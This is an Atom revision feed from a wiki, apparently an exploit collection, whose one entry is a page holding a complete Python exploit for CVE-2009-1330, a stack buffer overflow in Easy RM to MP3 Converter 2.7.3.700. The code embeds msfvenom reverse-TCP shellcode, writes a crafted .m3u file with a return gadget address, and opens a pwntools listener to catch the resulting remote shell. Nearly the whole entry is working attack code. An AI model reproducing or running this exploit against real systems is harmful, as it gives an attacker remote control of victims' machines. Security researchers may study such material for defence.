<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2009-1330_Easy_RM_to_MP3_Converter%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2009-1330 Easy RM to MP3 Converter堆棧緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2009-1330_Easy_RM_to_MP3_Converter%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2009-1330_Easy_RM_to_MP3_Converter%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T14:34:34Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2009-1330_Easy_RM_to_MP3_Converter%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=894&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO== &lt;pre&gt; # CVE-2009-1330  Exploit for buffer overflow in Easy RM to MP3 Converter 2.7.3.700 (CVE-2009-1330)  Based on: * pwntools * msfvenom / reverse\_tcp payload * rop...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2009-1330_Easy_RM_to_MP3_Converter%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=894&amp;oldid=prev"/>
		<updated>2021-04-02T03:40:09Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO== &amp;lt;pre&amp;gt; # CVE-2009-1330  Exploit for buffer overflow in Easy RM to MP3 Converter 2.7.3.700 (CVE-2009-1330)  Based on: * pwntools * msfvenom / reverse\_tcp payload * rop...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# CVE-2009-1330&lt;br /&gt;
&lt;br /&gt;
Exploit for buffer overflow in Easy RM to MP3 Converter 2.7.3.700 (CVE-2009-1330)&lt;br /&gt;
&lt;br /&gt;
Based on:&lt;br /&gt;
* pwntools&lt;br /&gt;
* msfvenom / reverse\_tcp payload&lt;br /&gt;
* ropper&lt;br /&gt;
* x64dbg&lt;br /&gt;
* Easy RM to MP3 Converter 2.7.3.700&lt;br /&gt;
&lt;br /&gt;
Vulnerable app available at https://www.exploit-db.com/exploits/10374&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/env python&lt;br /&gt;
#&lt;br /&gt;
# CVE-2009-1330 using:&lt;br /&gt;
# * pwntools&lt;br /&gt;
# * msfvenom / reverse_tcp payload&lt;br /&gt;
# * ropper&lt;br /&gt;
# * x64dbg&lt;br /&gt;
# * Easy RM to MP3 Converter 2.7.3.700&lt;br /&gt;
#&lt;br /&gt;
# Vulnerable app available at https://www.exploit-db.com/exploits/10374&lt;br /&gt;
&lt;br /&gt;
from pwn import p32, listen&lt;br /&gt;
from threading import Thread&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
def generate_payload():&lt;br /&gt;
    # EIP controlled on offset 82179&lt;br /&gt;
    # EDI points to shellcode at offset 9926&lt;br /&gt;
&lt;br /&gt;
    # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LPORT=4444 -a x86&lt;br /&gt;
    # LHOST=192.168.15.101 -f python --platform windows -b &amp;quot;\x00\x0a\x0d&amp;quot;&lt;br /&gt;
    shellcode = &amp;quot;\x90&amp;quot; * 10  # small NOP slide&lt;br /&gt;
    shellcode += &amp;quot;\xbf\x70\xf9\x1b\x1c\xda\xd0\xd9\x74\x24\xf4\x5e&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x29\xc9\xb1\x52\x31\x7e\x12\x03\x7e\x12\x83\xb6&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\xfd\xf9\xe9\xca\x16\x7f\x11\x32\xe7\xe0\x9b\xd7&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\xd6\x20\xff\x9c\x49\x91\x8b\xf0\x65\x5a\xd9\xe0&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\xfe\x2e\xf6\x07\xb6\x85\x20\x26\x47\xb5\x11\x29&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\xcb\xc4\x45\x89\xf2\x06\x98\xc8\x33\x7a\x51\x98&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\xec\xf0\xc4\x0c\x98\x4d\xd5\xa7\xd2\x40\x5d\x54&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\xa2\x63\x4c\xcb\xb8\x3d\x4e\xea\x6d\x36\xc7\xf4&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x72\x73\x91\x8f\x41\x0f\x20\x59\x98\xf0\x8f\xa4&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x14\x03\xd1\xe1\x93\xfc\xa4\x1b\xe0\x81\xbe\xd8&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x9a\x5d\x4a\xfa\x3d\x15\xec\x26\xbf\xfa\x6b\xad&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\xb3\xb7\xf8\xe9\xd7\x46\x2c\x82\xec\xc3\xd3\x44&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x65\x97\xf7\x40\x2d\x43\x99\xd1\x8b\x22\xa6\x01&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x74\x9a\x02\x4a\x99\xcf\x3e\x11\xf6\x3c\x73\xa9&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x06\x2b\x04\xda\x34\xf4\xbe\x74\x75\x7d\x19\x83&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x7a\x54\xdd\x1b\x85\x57\x1e\x32\x42\x03\x4e\x2c&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x63\x2c\x05\xac\x8c\xf9\x8a\xfc\x22\x52\x6b\xac&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x82\x02\x03\xa6\x0c\x7c\x33\xc9\xc6\x15\xde\x30&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x81\xd9\xb7\x35\x34\xb2\xc5\x49\xa7\x1e\x43\xaf&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\xad\x8e\x05\x78\x5a\x36\x0c\xf2\xfb\xb7\x9a\x7f&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x3b\x33\x29\x80\xf2\xb4\x44\x92\x63\x35\x13\xc8&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x22\x4a\x89\x64\xa8\xd9\x56\x74\xa7\xc1\xc0\x23&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\xe0\x34\x19\xa1\x1c\x6e\xb3\xd7\xdc\xf6\xfc\x53&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x3b\xcb\x03\x5a\xce\x77\x20\x4c\x16\x77\x6c\x38&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\xc6\x2e\x3a\x96\xa0\x98\x8c\x40\x7b\x76\x47\x04&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\xfa\xb4\x58\x52\x03\x91\x2e\xba\xb2\x4c\x77\xc5&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x7b\x19\x7f\xbe\x61\xb9\x80\x15\x22\xd9\x62\xbf&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x5f\x72\x3b\x2a\xe2\x1f\xbc\x81\x21\x26\x3f\x23&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\xda\xdd\x5f\x46\xdf\x9a\xe7\xbb\xad\xb3\x8d\xbb&amp;quot;&lt;br /&gt;
    shellcode += &amp;quot;\x02\xb3\x87&amp;quot;&lt;br /&gt;
&lt;br /&gt;
    filler1 = 'A' * 9926&lt;br /&gt;
    filler2 = 'B' * (82179 - len(filler1) - len(shellcode))&lt;br /&gt;
    CALL_EDI_ADDR = p32(0x100304ec)  # gadget from MSRMfilter03.dll&lt;br /&gt;
&lt;br /&gt;
    return filler1 + shellcode + filler2 + CALL_EDI_ADDR&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
def attack():&lt;br /&gt;
    payload = generate_payload()&lt;br /&gt;
    fname = &amp;quot;input.m3u&amp;quot;&lt;br /&gt;
&lt;br /&gt;
    f = open(fname, &amp;quot;w&amp;quot;)&lt;br /&gt;
    f.write(payload)&lt;br /&gt;
    f.close()&lt;br /&gt;
&lt;br /&gt;
    print(&amp;quot;File {} has been created.&amp;quot;.format(fname))&lt;br /&gt;
    print(&amp;quot;Please use target software to open payload.&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if __name__ == &amp;quot;__main__&amp;quot;:&lt;br /&gt;
    # set target info&lt;br /&gt;
    LHOST = &amp;quot;127.0.0.1&amp;quot;&lt;br /&gt;
    LPORT = 4444&lt;br /&gt;
&lt;br /&gt;
    thread = Thread(target=attack)&lt;br /&gt;
    thread.start()&lt;br /&gt;
&lt;br /&gt;
    listener = listen(port=LPORT)&lt;br /&gt;
    listener.wait_for_connection()&lt;br /&gt;
    listener.interactive()&lt;br /&gt;
&lt;br /&gt;
    thread.join()&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>